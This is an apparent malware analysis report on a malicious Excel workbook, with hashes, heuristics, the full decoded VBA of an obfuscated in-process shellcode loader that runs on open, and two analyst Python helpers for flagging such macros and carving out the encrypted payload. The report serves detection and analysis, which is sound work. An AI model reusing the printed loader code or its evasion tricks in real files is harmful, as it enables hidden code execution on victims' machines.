Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fba322adda5003d0…

MALICIOUS

Office (OLE)

Size: 38.7 KB
Created: 2017-07-27 14:08:21
Authoring application: Microsoft Excel
First seen: 2017-08-08
MD5: fa4e549d8a713b64b650a0265fdbb738
SHA-1: 2323318eac74962883c211195ae6f4faf7e08e97
SHA-256: fba322adda5003d0c414bae83d43c5c9781b5164770551320d11ed0ddfaa40c1
Risk score: 78

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution
Note: the macro does not exploit a software vulnerability; it runs only if the user enables macros, so T1204.002 (User Execution: Malicious File) describes the observed execution path more precisely than T1203. T1059.005 is well supported by the Workbook_Open chain shown in the decoded VBA below.

The workbook carries both an Excel 4.0 (XLM) macro sheet and a VBA project. The VBA declares VirtualAlloc and CreateThread from kernel32 under randomly named aliases, plus NtWriteVirtualMemory from NTDLL under its own name, and the Workbook_Open handler chains (via Document_Open) into a routine that: reads the workbook's own bytes back from disk (ActiveWorkbook.FullName), splits them on a long marker string and keeps the last segment, drops the first two characters, XOR-decrypts the remainder with the repeating key "fdYWNGcvoKBZUNbqPj", allocates an RWX buffer (MEM_COMMIT = &H1000, PAGE_EXECUTE_READWRITE = &H40), writes the decrypted bytes into the current process (handle -1) with NtWriteVirtualMemory, and starts a thread at the buffer. This is a self-contained in-process shellcode loader whose payload rides inside the document itself. No URL, dropped file or external process is visible in the macro, so whether the shellcode downloads a second stage or runs in place cannot be decided from the VBA alone; it requires decrypting and analysing the shellcode. Calling NtWriteVirtualMemory instead of RtlMoveMemory or WriteProcessMemory, and hiding the kernel32 imports behind Alias clauses, are evasions aimed at string-based macro scanners.

Heuristics (6)

  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    The VBA project declares VirtualAlloc from kernel32 (behind the alias vkaWKlhNTeWRNiTISHfF) and calls it with MEM_COMMIT (&H1000) and PAGE_EXECUTE_READWRITE (&H40), i.e. an RWX allocation. CreateThread (aliased as yzyJNyjBvkeFDlPGoJTVRjIAv) and NtWriteVirtualMemory from NTDLL are declared alongside it but are not separately flagged.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream (a visible sheet named "Makro"). XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022. Caveat: the extracted XLM listing below shows the sheet record but no cell formulas, so no XLM Auto_Open entry is visible in this sample; the execution path actually observed is the VBA Workbook_Open handler.
  • VBA macros detected [medium] 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro (a Word auto-execute name; in an Excel workbook it runs only because Workbook_Open calls it)
    Matched line in script
    Public Sub Document_Open()
        oTVSpOqBmopNcGR
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro (fires as soon as the workbook is opened with macros enabled)
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
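The heuristics above are string matches, and the thing a scanner has to get right for this sample is that the kernel32 imports are declared under random names with the real API only in the Alias clause, while NtWriteVirtualMemory is declared under its own name. The Python triage script below, added here as an example and not part of the analysis platform, resolves each Declare to its real API (Alias first, then the declared name, with ordinal aliases such as "#12" reported separately), groups the results into allocate/write/execute capabilities, and looks for an auto-execute entry point. The VBA it runs on is a constructed, shortened excerpt modelled on the decoded listing further down; the capability table and the verdict strings are my own labels.

```python
import re

# A Declare statement: the real API name is the Alias string when present,
# otherwise the declared name. Ordinal aliases ("#123") hide the name entirely.
DECLARE_RE = re.compile(
    r'^[ \t]*(?:Private|Public)?[ \t]*Declare[ \t]+(?:PtrSafe[ \t]+)?(?:Function|Sub)[ \t]+'
    r'(?P<name>\w+)[ \t]+Lib[ \t]+"(?P<lib>[^"]+)"(?:[ \t]+Alias[ \t]+"(?P<alias>[^"]+)")?',
    re.IGNORECASE | re.MULTILINE,
)

# Auto-execute handlers for Excel and Word documents.
AUTOEXEC_RE = re.compile(
    r'^[ \t]*(?:Public[ \t]+|Private[ \t]+)?Sub[ \t]+'
    r'(Workbook_Open|Workbook_Activate|Auto_Open|AutoOpen|Document_Open|AutoExec)\b',
    re.IGNORECASE | re.MULTILINE,
)

# APIs grouped by what an in-process loader needs (assumed grouping, lowercase).
CAPABILITIES = {
    "alloc": {"virtualalloc", "virtualallocex", "virtualprotect", "ntallocatevirtualmemory"},
    "write": {"ntwritevirtualmemory", "writeprocessmemory", "rtlmovememory"},
    "exec":  {"createthread", "createremotethread", "ntcreatethreadex", "queueuserapc",
              "rtlcreateuserthread"},
}


def resolve_declares(source):
    """Map each declared VBA name to (library, real API name); ordinal imports separately."""
    named, ordinal = {}, []
    for m in DECLARE_RE.finditer(source):
        real = m.group("alias") or m.group("name")
        if real.startswith("#"):
            ordinal.append((m.group("name"), m.group("lib"), real))
        else:
            named[m.group("name")] = (m.group("lib").lower(), real.lower())
    return named, ordinal


def triage_vba(source):
    """Return resolved APIs, capability groups, auto-exec handlers and a verdict."""
    named, ordinal = resolve_declares(source)
    apis = {real for _, real in named.values()}
    caps = {cap: sorted(apis & names) for cap, names in CAPABILITIES.items()}
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(source)})
    chain = all(caps.values())  # alloc + write + exec all present
    if chain and autoexec:
        verdict = "in-process shellcode loader with auto-execution"
    elif chain:
        verdict = "memory-execution primitives present, no auto-execute handler"
    elif any(caps.values()) or ordinal:
        verdict = "suspicious API declarations"
    else:
        verdict = "no memory-execution indicators"
    return {"declares": named, "ordinal_imports": ordinal, "capabilities": caps,
            "autoexec": autoexec, "loader_chain": chain, "verdict": verdict}


# Constructed excerpt modelled on the decoded macro listing (parameter lists shortened).
SAMPLE_VBA = '''\
#If VBA7 Then
Private Declare PtrSafe Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal a As Long, ByVal b As Long, ByVal c As LongPtr, d As Long, ByVal e As Long, f As Long) As LongPtr
Private Declare PtrSafe Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal a As Long, ByVal b As LongPtr, ByVal c As Long, ByVal d As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal a As LongPtr, ByVal b As LongPtr, ByVal c As String, ByVal d As LongPtr, ByRef e As LongPtr) As LongPtr
#End If

Public Sub Document_Open()
    oTVSpOqBmopNcGR
End Sub

Sub Workbook_Open()
    Document_Open
End Sub
'''

# Constructed benign control: a Sleep import and no auto-execute handler.
BENIGN_VBA = '''\
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Sub Refresh()
    Sleep 100
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = triage_vba(src)
        print(label, "->", r["verdict"], r["capabilities"], r["autoexec"])
```

Run it on the output of olevba (or any decoded VBA text) instead of the embedded excerpt by feeding that text to triage_vba(). Matching on the Alias string rather than the declared identifier is what makes the VirtualAlloc and CreateThread declarations in this sample visible; a scanner that only tokenises identifiers sees two random names and one NTDLL call.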

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4736 bytes
SHA-256: 3370d9f502661f379429f9a3b0fa0919b7ccd4bf634a30492dfc8fcd4b0ed494
The module's VB_Name "BuÇalışmaKitabı" is the Turkish-locale name of the ThisWorkbook object, so the loader lives in the workbook object module (where Workbook_Open is valid) and the authoring Excel ran with a Turkish locale, consistent with the "Makro" sheet name.
Detection
ClamAV: No threats found
Obfuscation or payload: likely
35 of 70 identifiers look randomly generated (e.g. 'yzyJNyjBvkeFDlPGoJTVRjIAv', 'vkaWKlhNTeWRNiTISHfF'), consistent with name-mangling obfuscation. The one long base64-like blob in the carved artifact is the string literal passed to Split() (beginning 'zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGD'); it is a delimiter, not encoded data. The encrypted shellcode itself is not inside the VBA project: the loader reads the workbook file back from disk and takes whatever follows the last occurrence of that delimiter.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As LongPtr, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As LongPtr
Private Declare PtrSafe Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As LongPtr, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As LongPtr, ByVal lIYUtUgJzcn As LongPtr, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As LongPtr, ByRef SUSKHSVf As LongPtr) As LongPtr
#Else
Private Declare Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread"  (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As Long, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As Long
Private Declare Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As Long, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As Long, ByVal lIYUtUgJzcn As Long, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As Long, ByRef SUSKHSVf As Long) As Long
#End If

Const mnFuhDfKvQHgUisvxL = &H1000
Const sswxspBrjhMY = &H40

Public Sub oTVSpOqBmopNcGR()
    Dim TPLYmybAh() As Byte

    TPLYmybAh = dFBgqsXGxAtVKCECEoiJZUEu(ActiveWorkbook.FullName)
    Dim OhVBlZ As String
    OhVBlZ = StrConv(TPLYmybAh, 64)
    
    Dim dAuZnSnrpKXUGVyOXV
    dAuZnSnrpKXUGVyOXV = Split(OhVBlZ, "zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGDYdlAZnpVYOzKQyJaKFkRnQVBktpWJiEFnJEdoJVwOKbnjECRdiChlOqhiJpFXtmPkTwgUFMaJOdDOHsGQyTBFwtytwVEuqzuyldphvXxvCyxLMtAqJOzALjNAXNyJhGtpIeCDdzvB")

    Dim ziiQRvKnZjFLdqlYgwiGWxGX As String
    Dim PjbgjZajqFy As String
    Dim JIPOuyFscUpOCTUykmzSeYmEO As String
    PjbgjZajqFy = StrConv(StrConv(dAuZnSnrpKXUGVyOXV(UBound(dAuZnSnrpKXUGVyOXV)), 64), 128)
    JIPOuyFscUpOCTUykmzSeYmEO = Mid$(PjbgjZajqFy, 3, Len(PjbgjZajqFy))

    ziiQRvKnZjFLdqlYgwiGWxGX = WJPyO("fdYWNGcvoKBZUNbqPj", JIPOuyFscUpOCTUykmzSeYmEO)
    
    #If VBA7 Then
        Dim GcpnLvPzvO As LongPtr
        Dim eIhjodoRfxikPQne As LongPtr
    #Else
        Dim GcpnLvPzvO As Long
        Dim eIhjodoRfxikPQne As Long
    #End If

    GcpnLvPzvO = vkaWKlhNTeWRNiTISHfF(0, Len(ziiQRvKnZjFLdqlYgwiGWxGX), mnFuhDfKvQHgUisvxL, sswxspBrjhMY)
    eIhjodoRfxikPQne = NtWriteVirtualMemory(-1, GcpnLvPzvO, ziiQRvKnZjFLdqlYgwiGWxGX, Len(ziiQRvKnZjFLdqlYgwiGWxGX), 0)
    eIhjodoRfxikPQne = yzyJNyjBvkeFDlPGoJTVRjIAv(0, 0, GcpnLvPzvO, 0, 0, 0)
End Sub

Public Function dFBgqsXGxAtVKCECEoiJZUEu(ByVal rsOpRbBlbNPigJQHeFQSdwTEdsjx As String) As Byte()
    Dim PjbgjZajqFy As Long
    Dim JIPOuyFscUpOCTUykmzSeYmEO() As Byte
    PjbgjZajqFy = FreeFile
    If LenB(Dir(rsOpRbBlbNPigJQHeFQSdwTEdsjx)) Then
        Open rsOpRbBlbNPigJQHeFQSdwTEdsjx For Binary Access Read As PjbgjZajqFy
        ReDim JIPOuyFscUpOCTUykmzSeYmEO(LOF(PjbgjZajqFy) - 1&) As Byte
        Get PjbgjZajqFy, , JIPOuyFscUpOCTUykmzSeYmEO
        Close PjbgjZajqFy
    Else
        Err.Raise 53
    End If
    dFBgqsXGxAtVKCECEoiJZUEu = JIPOuyFscUpOCTUykmzSeYmEO
    Erase JIPOuyFscUpOCTUykmzSeYmEO
End Function

Public Sub Document_Open()
    oTVSpOqBmopNcGR
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function WJPyO(ratOeQJTEfkUUnEpeBYegFNLvkZsB As String, CEgpwCzgutDFoYOsKBxGFnzJTMn As String) As String
    Dim tTQrrIDGOFRbQYhEBAqPW As Long
    Dim AyUUqo As String
    Dim wvKoRNA As Integer, PoGKTwQZoQYni As Integer, a As Long

    For tTQrrIDGOFRbQYhEBAqPW = 1 To Len(CEgpwCzgutDFoYOsKBxGFnzJTMn)
        a = tTQrrIDGOFRbQYhEBAqPW Mod Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
        If a = 0 Then a = Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
        
        wvKoRNA = Asc(Mid$(CEgpwCzgutDFoYOsKBxGFnzJTMn, tTQrrIDGOFRbQYhEBAqPW, 1))
        PoGKTwQZoQYni = Asc(Mid$(ratOeQJTEfkUUnEpeBYegFNLvkZsB, a, 1))
        AyUUqo = AyUUqo + Chr(wvKoRNA Xor PoGKTwQZoQYni)
    Next tTQrrIDGOFRbQYhEBAqPW
    
   WJPyO = AyUUqo
End Function
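The routine oTVSpOqBmopNcGR above never touches the network: it reopens the workbook from disk, keeps whatever follows the last occurrence of the long delimiter string, drops two characters, XOR-decrypts the rest with the repeating key in WJPyO, and executes the result. The Python below, added here as an analyst helper and not part of the sample or of the analysis platform, reproduces that carving and decryption on raw bytes so the shellcode can be dumped for disassembly or emulation without running the macro. Because the real sample is not on this page, the workbook bytes it runs on are a constructed stand-in (an OLE-like header, a decoy copy of the delimiter, the delimiter again, two filler bytes, then an XOR-encrypted payload); only the delimiter and the key are taken from the listing. It deliberately works on raw bytes rather than reproducing the VBA's StrConv round trip, which passes through the ANSI code page and is lossless only for byte values that code page defines.

```python
import hashlib
import sys

# Taken from the decoded macro above: the Split() delimiter and the WJPyO() key.
MARKER = (b"zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGDYdlAZnpVYOzKQyJaKFkRnQVBktpWJiEFnJEdoJ"
          b"VwOKbnjECRdiChlOqhiJpFXtmPkTwgUFMaJOdDOHsGQyTBFwtytwVEuqzuyldphvXxvCyxLMtAqJOzALjNAXNyJhGtpIeCDdzvB")
XOR_KEY = b"fdYWNGcvoKBZUNbqPj"
SKIP = 2  # Mid$(s, 3, ...) drops the first two characters of the carved segment


def xor_repeating(data, key):
    """WJPyO(): byte i is XORed with key[i mod len(key)]. The VBA works 1-based and
    maps a Mod result of 0 back to Len(key), which is the same cyclic schedule."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve_segment(workbook, marker=MARKER):
    """Split(...)(UBound(...)): everything after the LAST occurrence of the marker."""
    if marker not in workbook:
        # The VBA would XOR and execute the whole file in this case; refuse instead.
        raise ValueError("delimiter not found: not this loader variant, or file truncated")
    return workbook.rsplit(marker, 1)[1]


def extract_shellcode(workbook, marker=MARKER, key=XOR_KEY, skip=SKIP):
    """The pipeline of oTVSpOqBmopNcGR up to the point where VirtualAlloc is called."""
    return xor_repeating(carve_segment(workbook, marker)[skip:], key)


def build_demo_workbook(payload, marker=MARKER, key=XOR_KEY):
    """Constructed stand-in for the real sample (not a valid OLE file): header bytes,
    a decoy copy of the marker, the real marker, two filler bytes, encrypted payload."""
    return (b"\xd0\xcf\x11\xe0" + b"\x00" * 60 + marker + b"decoy"
            + marker + b"\x00\x00" + xor_repeating(payload, key))


def dump(path):
    """Carve the shellcode out of a workbook on disk and write it next to the file."""
    with open(path, "rb") as f:
        shellcode = extract_shellcode(f.read())
    out = path + ".shellcode.bin"
    with open(out, "wb") as f:
        f.write(shellcode)
    return out, len(shellcode), hashlib.sha256(shellcode).hexdigest()


if __name__ == "__main__":
    if len(sys.argv) == 2:
        out, size, digest = dump(sys.argv[1])
        print(f"{size} bytes -> {out}  sha256={digest}")
    else:
        demo_payload = bytes(range(256))
        recovered = extract_shellcode(build_demo_workbook(demo_payload))
        print("demo round trip ok:", recovered == demo_payload)
```

Usage: `python carve.py fba322adda5003d0c414bae83d43c5c9781b5164770551320d11ed0ddfaa40c1.xls` writes the decrypted buffer to a .shellcode.bin file; the first bytes of a real dump should look like position-independent code (typically an API-hashing stub) rather than text, and the ValueError path fires if the file is not this loader variant.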